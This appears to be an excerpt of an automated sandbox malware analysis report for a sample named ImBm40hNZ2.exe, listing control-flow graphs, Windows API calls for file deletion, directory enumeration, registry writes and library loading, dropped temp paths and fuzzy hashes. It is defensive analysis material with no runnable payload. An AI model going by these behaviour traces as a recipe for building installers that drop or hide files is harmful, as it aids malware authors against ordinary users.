                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 313 405451-405477 call 40570f 316 405490-405497 313->316 317 405479-40548b DeleteFileA 313->317 319 405499-40549b 316->319 320 4054aa-4054ba call 405b91 316->320 318 40561a-40561e 317->318 321 4054a1-4054a4 319->321 322 4055c8-4055cd 319->322 328 4054c9-4054ca call 405668 320->328 329 4054bc-4054c7 lstrcatA 320->329 321->320 321->322 322->318 324 4055cf-4055d2 322->324 326 4055d4-4055da 324->326 327 4055dc-4055e4 call 405e95 324->327 326->318 327->318 337 4055e6-4055fa call 405621 call 405409 327->337 331 4054cf-4054d2 328->331 329->331 334 4054d4-4054db 331->334 335 4054dd-4054e3 lstrcatA 331->335 334->335 336 4054e8-405506 lstrlenA FindFirstFileA 334->336 335->336 338 40550c-405523 call 40564c 336->338 339 4055be-4055c2 336->339 352 405612-405615 call 404e7c 337->352 353 4055fc-4055ff 337->353 346 405525-405529 338->346 347 40552e-405531 338->347 339->322 341 4055c4 339->341 341->322 346->347 349 40552b 346->349 350 405533-405538 347->350 351 405544-405552 call 405b91 347->351 349->347 355 40553a-40553c 350->355 356 40559d-4055af FindNextFileA 350->356 364 405554-40555c 351->364 365 405569-405574 call 405409 351->365 352->318 353->326 358 405601-405610 call 404e7c call 405a45 353->358 355->351 359 40553e-405542 355->359 356->338 361 4055b5-4055b8 FindClose 356->361 358->318 359->351 359->356 361->339 364->356 368 40555e-405567 call 405451 364->368 373 405595-405598 call 404e7c 365->373 374 405576-405579 365->374 368->356 373->356 375 40557b-40558b call 404e7c call 405a45 374->375 376 40558d-405593 374->376 375->356 376->356
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,756A3410,00000000), ref: 0040547A
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(0042A828,\*.*,0042A828,?,?,C:\Users\user\AppData\Local\Temp\,756A3410,00000000), ref: 004054C2
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00409014,?,0042A828,?,?,C:\Users\user\AppData\Local\Temp\,756A3410,00000000), ref: 004054E3
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,00409014,?,0042A828,?,?,C:\Users\user\AppData\Local\Temp\,756A3410,00000000), ref: 004054E9
                                                                                                                                                                                                                                                                • FindFirstFileA.KERNEL32(0042A828,?,?,?,00409014,?,0042A828,?,?,C:\Users\user\AppData\Local\Temp\,756A3410,00000000), ref: 004054FA
                                                                                                                                                                                                                                                                • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004055A7
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 004055B8
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • \*.*, xrefs: 004054BC
                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040545F
                                                                                                                                                                                                                                                                • "C:\Users\user\Desktop\ImBm40hNZ2.exe", xrefs: 00405451
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                • String ID: "C:\Users\user\Desktop\ImBm40hNZ2.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                                                                                                                                • API String ID: 2035342205-2389351668
                                                                                                                                                                                                                                                                • Opcode ID: 14b20490f48db4f604ba7a7e355ea765e6e76522d2b3a4482e8726861c8d2d22
                                                                                                                                                                                                                                                                • Instruction ID: aa82d0309f1ddddfbe6c40bd1d7433d9f6730d94ca5b26b608a9a455718634cb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 14b20490f48db4f604ba7a7e355ea765e6e76522d2b3a4482e8726861c8d2d22
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D51D030900A04BADB216B618C45BBF7AB9DF86715F14407BF444B61D2D73C9982DEAE
                                                                                                                                                                                                                                                                Function 0040231C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 556 40231c-402362 call 402af2 call 4029fd * 2 RegCreateKeyExA 563 402892-4028a1 556->563 564 402368-402370 556->564 566 402380-402383 564->566 567 402372-40237f call 4029fd lstrlenA 564->567 569 402393-402396 566->569 570 402385-402392 call 4029e0 566->570 567->566 574 4023a7-4023bb RegSetValueExA 569->574 575 402398-4023a2 call 402e62 569->575 570->569 578 4023c0-402496 RegCloseKey 574->578 579 4023bd 574->579 575->574 578->563 581 402663-40266a 578->581 579->578 581->563
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040235A
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsy1C7B.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040237A
                                                                                                                                                                                                                                                                • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsy1C7B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B3
                                                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsy1C7B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseCreateValuelstrlen
                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsy1C7B.tmp
                                                                                                                                                                                                                                                                • API String ID: 1356686001-554189162
                                                                                                                                                                                                                                                                • Opcode ID: 508b578a67204aea12c544e84febf93d2e7aeea21e5f030e7b169d0e0709078f
                                                                                                                                                                                                                                                                • Instruction ID: 18d1fb4f89ff8b2d67b1f04eab716aa9824ced1508c62e5ffc4d870c518d25f3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 508b578a67204aea12c544e84febf93d2e7aeea21e5f030e7b169d0e0709078f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F1190B1A00118BEEB10ABA5DE89EAF7678FB10358F10403AF905B61D0D7B86D01A668
                                                                                                                                                                                                                                                                Function 00402036 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132comCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 702 402036-402071 call 4029fd * 5 call 40568e 715 402073-402075 call 4029fd 702->715 716 40207a-402093 CoCreateInstance 702->716 715->716 718 402173-40217a 716->718 719 402099-4020ae 716->719 720 40217c-402181 call 401423 718->720 724 4020b4-4020c6 719->724 725 402166-402171 719->725 726 402892-4028a1 720->726 730 4020d6-4020df 724->730 731 4020c8-4020d1 724->731 725->718 733 402186-402188 725->733 734 4020e1-4020e6 730->734 735 4020eb-4020fd 730->735 731->730 733->720 733->726 734->735 737 402113-40212d 735->737 738 4020ff-40210f 735->738 741 40215d-402161 737->741 742 40212f-40214b MultiByteToWideChar 737->742 738->737 741->725 742->741 743 40214d-402157 742->743 744 40215b 743->744 744->741
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(00407490,?,00000001,00407480,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040208B
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407480,?,?), ref: 00402143
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Sweatsuit, xrefs: 004020CB
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Sweatsuit
                                                                                                                                                                                                                                                                • API String ID: 123533781-378292206
                                                                                                                                                                                                                                                                • Opcode ID: f1d18f11176e237c2cc033a31fb9b692edde4e12a279000898c87f708c8b7624
                                                                                                                                                                                                                                                                • Instruction ID: e3d685ac9dfc0cba4c7b393403c349ec43a7b6e1f6688ebaafdf98cf5e04d43d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f1d18f11176e237c2cc033a31fb9b692edde4e12a279000898c87f708c8b7624
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE417D75A00109AFCB00EFA4CE88E9E7BB5BF48354B204269F911FB2D1DA799D41DB54
                                                                                                                                                                                                                                                                Function 00405EBC Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,?,?,00403127,00000008), ref: 00405ECE
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(?,?,?,00403127,00000008), ref: 00405ED9
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00405EEA
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 310444273-0
                                                                                                                                                                                                                                                                • Opcode ID: 6a16e0dd3cc6108475a6e7adf37e54332756fcc3f7317002038e5d5bd84af621
                                                                                                                                                                                                                                                                • Instruction ID: 664a0ab70e0d061655fae0e19733d53a5cade881539b1a7a2127248cbf20f03b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a16e0dd3cc6108475a6e7adf37e54332756fcc3f7317002038e5d5bd84af621
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34E0C232A04511ABC7109B74EC08A7B73A8EF88650304893EF541F7151DB34BC11ABEE
                                                                                                                                                                                                                                                                Function 00405E95 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindFirstFileA.KERNELBASE(?,0042B070,0042AC28,00405752,0042AC28,0042AC28,00000000,0042AC28,0042AC28,?,?,756A3410,00405471,?,C:\Users\user\AppData\Local\Temp\,756A3410), ref: 00405EA0
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00405EAC
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                                                                                                                                                • Opcode ID: 45004ede6c553f1c155b4d32efd02d1a694f01ec3798d929b8bcbd89b235e1a6
                                                                                                                                                                                                                                                                • Instruction ID: beb1acdad78be98fe1ce0201480667c0c5eddde0777449e7049f749fb66a5638
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 45004ede6c553f1c155b4d32efd02d1a694f01ec3798d929b8bcbd89b235e1a6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EDD01232D0E4309BD3115B38AC0C84BBA58DB053317608B33B8A5F13E0D3349D529AED
                                                                                                                                                                                                                                                                Function 00402645 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 00402654
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileFindFirst
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1974802433-0
                                                                                                                                                                                                                                                                • Opcode ID: 1f146cd9d29f21cce062e12bf8477e486132f18186281bfc9247f7fd0a66074d
                                                                                                                                                                                                                                                                • Instruction ID: d998dab733500fc6835523815e3f31be6148439617fe8245f85c198535f3b19e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f146cd9d29f21cce062e12bf8477e486132f18186281bfc9247f7fd0a66074d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9CF0A072608110ABD700E7B89949AEEB768DB21324F60467BE141B20C1D7B89A41EA2A
                                                                                                                                                                                                                                                                Function 0040361A Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216stringregistrylibraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 113 40361a-403632 call 405ebc 116 403634-403644 call 405aef 113->116 117 403646-403677 call 405a78 113->117 125 40369a-4036c3 call 4038df call 40570f 116->125 122 403679-40368a call 405a78 117->122 123 40368f-403695 lstrcatA 117->123 122->123 123->125 131 4036c9-4036ce 125->131 132 40374a-403752 call 40570f 125->132 131->132 133 4036d0-4036f4 call 405a78 131->133 138 403760-403785 LoadImageA 132->138 139 403754-40375b call 405bb3 132->139 133->132 140 4036f6-4036f8 133->140 142 403806-40380e call 40140b 138->142 143 403787-4037b7 RegisterClassA 138->143 139->138 147 403709-403715 lstrlenA 140->147 148 4036fa-403707 call 40564c 140->148 155 403810-403813 142->155 156 403818-403823 call 4038df 142->156 144 4038d5 143->144 145 4037bd-403801 SystemParametersInfoA CreateWindowExA 143->145 152 4038d7-4038de 144->152 145->142 149 403717-403725 lstrcmpiA 147->149 150 40373d-403745 call 405621 call 405b91 147->150 148->147 149->150 154 403727-403731 GetFileAttributesA 149->154 150->132 159 403733-403735 154->159 160 403737-403738 call 405668 154->160 155->152 166 403829-403846 ShowWindow LoadLibraryA 156->166 167 4038ac-4038b4 call 404f4e 156->167 159->150 159->160 160->150 169 403848-40384d LoadLibraryA 166->169 170 40384f-403861 GetClassInfoA 166->170 174 4038b6-4038bc 167->174 175 4038ce-4038d0 call 40140b 167->175 169->170 172 403863-403873 GetClassInfoA RegisterClassA 170->172 173 403879-4038aa DialogBoxParamA call 40140b call 40356a 170->173 172->173 173->152 174->155 177 4038c2-4038c9 call 40140b 174->177 175->144 177->155
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00405EBC: GetModuleHandleA.KERNEL32(?,?,?,00403127,00000008), ref: 00405ECE
                                                                                                                                                                                                                                                                  • Part of subcall function 00405EBC: LoadLibraryA.KERNELBASE(?,?,?,00403127,00000008), ref: 00405ED9
                                                                                                                                                                                                                                                                  • Part of subcall function 00405EBC: GetProcAddress.KERNEL32(00000000,?), ref: 00405EEA
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(1033,00429820,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429820,00000000,00000006,C:\Users\user\AppData\Local\Temp\,756A3410,"C:\Users\user\Desktop\ImBm40hNZ2.exe",00000000), ref: 00403695
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens,1033,00429820,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429820,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 0040370A
                                                                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(?,.exe), ref: 0040371D
                                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(Call), ref: 00403728
                                                                                                                                                                                                                                                                • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens), ref: 00403771
                                                                                                                                                                                                                                                                  • Part of subcall function 00405AEF: wsprintfA.USER32 ref: 00405AFC
                                                                                                                                                                                                                                                                • RegisterClassA.USER32(0042DB40), ref: 004037AE
                                                                                                                                                                                                                                                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004037C6
                                                                                                                                                                                                                                                                • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004037FB
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403831
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(RichEd20), ref: 00403842
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(RichEd32), ref: 0040384D
                                                                                                                                                                                                                                                                • GetClassInfoA.USER32(00000000,RichEdit20A,0042DB40), ref: 0040385D
                                                                                                                                                                                                                                                                • GetClassInfoA.USER32(00000000,RichEdit,0042DB40), ref: 0040386A
                                                                                                                                                                                                                                                                • RegisterClassA.USER32(0042DB40), ref: 00403873
                                                                                                                                                                                                                                                                • DialogBoxParamA.USER32(?,00000000,004039AC,00000000), ref: 00403892
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                • String ID: "C:\Users\user\Desktop\ImBm40hNZ2.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                • API String ID: 914957316-3833761218
                                                                                                                                                                                                                                                                • Opcode ID: 5d3310b5a1c8becea85e3e4cd1ba9fd0528a7c4b850719062e04f152db35815d
                                                                                                                                                                                                                                                                • Instruction ID: d178aa451f166566eaf2c3163fe56623853c288c4747cf6087cde58c0eecb14b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d3310b5a1c8becea85e3e4cd1ba9fd0528a7c4b850719062e04f152db35815d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2961B4B1B442406ED620AF629C45F273EACE745749F40457EF904B72E1C77DAD02CA2D
                                                                                                                                                                                                                                                                Function 00402C29 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

